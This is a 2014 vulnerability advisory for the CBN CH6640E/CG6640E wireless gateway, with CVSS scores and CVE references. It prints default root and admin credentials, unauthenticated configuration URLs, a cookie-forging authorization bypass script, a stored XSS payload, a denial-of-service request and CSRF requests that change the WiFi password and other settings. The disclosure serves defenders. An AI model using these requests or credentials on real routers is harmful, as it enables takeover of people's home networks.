10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
6.8 Medium
AI Score
Confidence
Low
0.045 Low
EPSS
Percentile
92.5%
Title: CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities
Advisory ID: ZSL-2014-5203
Type: Local/Remote
Impact: Security Bypass, Exposure of Sensitive Information, Cross-Site Scripting, DoS
Risk: (3/5)
Release Date: 25.10.2014
The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.
The CBN modem gateway suffers from multiple vulnerabilities including authorization bypass information disclosure, stored XSS, CSRF and denial of service.
Compal Broadband Networks (CBN), Inc. - <http://www.icbn.com.tw>
Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
N/A
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <http://cxsecurity.com/issue/WLB-2014100162>
[2] <http://www.exploit-db.com/exploits/35075/>
[3] <http://osvdb.org/show/osvdb/113836>
[4] <http://osvdb.org/show/osvdb/113837>
[5] <http://osvdb.org/show/osvdb/113838>
[6] <http://osvdb.org/show/osvdb/113839>
[7] <http://osvdb.org/show/osvdb/113840>
[8] <http://osvdb.org/show/osvdb/113841>
[9] <http://osvdb.org/show/osvdb/113842>
[10] <http://osvdb.org/show/osvdb/113843>
[11] <http://packetstormsecurity.com/files/128860>
[12] <http://www.securityfocus.com/bid/70762>
[13] <http://xforce.iss.net/xforce/xfdb/98328>
[14] <http://xforce.iss.net/xforce/xfdb/98329>
[15] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653>
[16] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654>
[17] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655>
[18] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656>
[19] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657>
[20] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8653>
[21] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8654>
[22] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8655>
[23] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8656>
[24] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8657>
[25.10.2014] - Initial release
[28.10.2014] - Added reference [1], [2], [3], [4], [5], [6], [7], [8], [9], [10], [11] and [12]
[30.10.2014] - Added reference [13] and [14]
[07.11.2014] - Added reference [15], [16], [17], [18], [19], [20], [21], [22], [23] and [24]
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities
Vendor: Compal Broadband Networks (CBN), Inc.
Product web page: http://www.icbn.com.tw
Affected version: Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,
home office, or small business/enterprise. It can be used in households with
one or more computers capable of wireless connectivity for remote access to
the wireless gateway.
Default credentials:
admin/admin - Allow access gateway pages
root/compalbn - Allow access gateway, provisioning pages and provide more
configuration information.
Desc: The CBN modem gateway suffers from multiple vulnerabilities including
authorization bypass information disclosure, stored XSS, CSRF and denial of
service.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5203
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
04.10.2014
---
Authorization Bypass Information Disclosure Vulnerability
#########################################################
http://192.168.0.1/xml/CmgwWirelessSecurity.xml
http://192.168.0.1/xml/DocsisConfigFile.xml
http://192.168.0.1/xml/CmgwBasicSetup.xml
http://192.168.0.1/basicDDNS.html
http://192.168.0.1/basicLanUsers.html
http://192.168.0.1:5000/rootDesc.xml
Set cookie: userData to root or admin, reveals additional pages/info.
--
</p>
<script>
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
</script>
--
Denial of Service (DoS) for all WiFi connected clients (disconnect)
###################################################################
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
###############################################
Cookie: userData
Value: hax0r"><script>alert(document.cookie);</script>
--
<script>
document.cookie="hax0r"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";
--
Cross-Site Request Forgery (CSRF) Vulnerability
###############################################
DDNS config:
------------
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
-----------------
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
-----------------------------------------------------
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
--------------------
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
</body></html>